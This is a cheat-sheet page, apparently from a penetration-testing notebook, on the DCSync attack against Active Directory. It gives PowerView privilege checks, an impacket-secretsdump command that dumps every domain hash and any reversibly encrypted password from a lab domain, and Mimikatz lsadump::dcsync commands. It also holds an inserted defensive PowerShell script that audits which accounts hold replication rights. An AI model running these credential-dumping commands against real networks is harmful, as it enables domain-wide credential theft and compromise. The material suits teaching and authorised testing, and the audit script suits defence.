DCSync
About
DCSync is a post-exploitation technique that abuses the Microsoft Directory Replication Service Remote Protocol (MS-DRSR), which is normally used to synchronize data between Domain Controllers.
If an attacker obtains the appropriate replication privileges in Active Directory (such as Replicating Directory Changes All), they can impersonate a Domain Controller and request a targeted sync of sensitive directory data — including password hashes, Kerberos tickets, and user credentials — without replicating the entire domain.
This results in full credential compromise over the network, without touching LSASS or memory on a domain controller.
Checking Privs
Group Membership Check
PS C:\> Get-DomainUser -Identity songbird | select samaccountname,objectsid,memberof,useraccountcontrol | fl
Rights Check
PS C:\> $sid = "S-1-5-21-blahblahblah-1164"
PS C:\> Get-ObjectAcl "DC=militech,DC=local" -ResolveGUIDs | ? { ($_.ObjectAceType -match 'Replication-Get')} | ?{$_.SecurityIdentifier -match $sid} |select AceQualifier, ObjectDN, ActiveDirectoryRights,SecurityIdentifier,ObjectAceType | fl
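The rights check above, generalized as an added example (not from the original page): instead of testing one SID, list every principal that holds any of the three replication control access rights on the domain root, so unexpected holders stand out. It assumes the ActiveDirectory module and its AD: drive are available and that the domain is resolved from the current session; the GUIDs are the schema-defined values for the three rights.

```powershell
# Added audit example (not from the original page): enumerate all principals
# holding DS-Replication-Get-Changes / -All / -In-Filtered-Set on the domain NC.
# Expected holders are Domain Controllers, Enterprise Domain Controllers,
# Administrators, Domain Admins, Enterprise Admins and SYSTEM; anything else
# (a regular user such as "songbird") is DCSync-capable and deserves review.
Import-Module ActiveDirectory

# Control access right GUIDs from the Extended-Rights container of the schema.
$ReplicationRights = @{
    '1131f6aa-9c07-11d1-f79f-00c04fc2dcd2' = 'DS-Replication-Get-Changes'
    '1131f6ad-9c07-11d1-f79f-00c04fc2dcd2' = 'DS-Replication-Get-Changes-All'
    '89e95b76-444d-4c62-991a-0facbeda640c' = 'DS-Replication-Get-Changes-In-Filtered-Set'
}

# Domain naming context, e.g. DC=militech,DC=local (assumed to be the
# domain of the current session).
$domainDN = (Get-ADDomain).DistinguishedName
$acl = Get-Acl -Path "AD:\$domainDN"

$acl.Access |
    Where-Object {
        $_.AccessControlType -eq 'Allow' -and
        $ReplicationRights.ContainsKey($_.ObjectType.ToString())
    } |
    ForEach-Object {
        [PSCustomObject]@{
            Principal = $_.IdentityReference.Value
            Right     = $ReplicationRights[$_.ObjectType.ToString()]
            Inherited = $_.IsInherited
        }
    } |
    Sort-Object Principal, Right |
    Format-Table -AutoSize
```

This only matches explicit extended-right ACEs; principals holding GenericAll or WriteDacl on the domain root can grant themselves these rights and should be reviewed separately.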
Reversible Encryption Check
PS C:\> Get-ADUser -Filter 'userAccountControl -band 128' -Properties userAccountControl
# OR
PS C:\> Get-DomainUser -Identity * | ? {$_.useraccountcontrol -like '*ENCRYPTED_TEXT_PWD_ALLOWED*'} |select samaccountname,useraccountcontrol
Secretsdump
impacket-secretsdump -outputfile militech_hashes -just-dc MILITECH/songbird@13.13.13.13
Additional Parameters
-just-dc-ntlm
- NTLM hashes only
-just-dc-user <USERNAME>
- Extract data for a certain user only
-pwd-last-set
- Show the last time each user changed their password
-history
- Dump password history
-user-status
- Show whether the user is disabled
Secretsdump writes a separate output file for each type of credential:
Kerberos Tickets
NTLM Hashes
Cleartext Reversible Passwords
(only for accounts with reversible encryption enabled; because we are replicating from the DC, the tool also retrieves the decryption keys and decrypts these passwords automatically)
Mimikatz
.\mimikatz.exe
mimikatz # privilege::debug
mimikatz # lsadump::dcsync /domain:MILITECH.LOCAL /user:MILITECH\administrator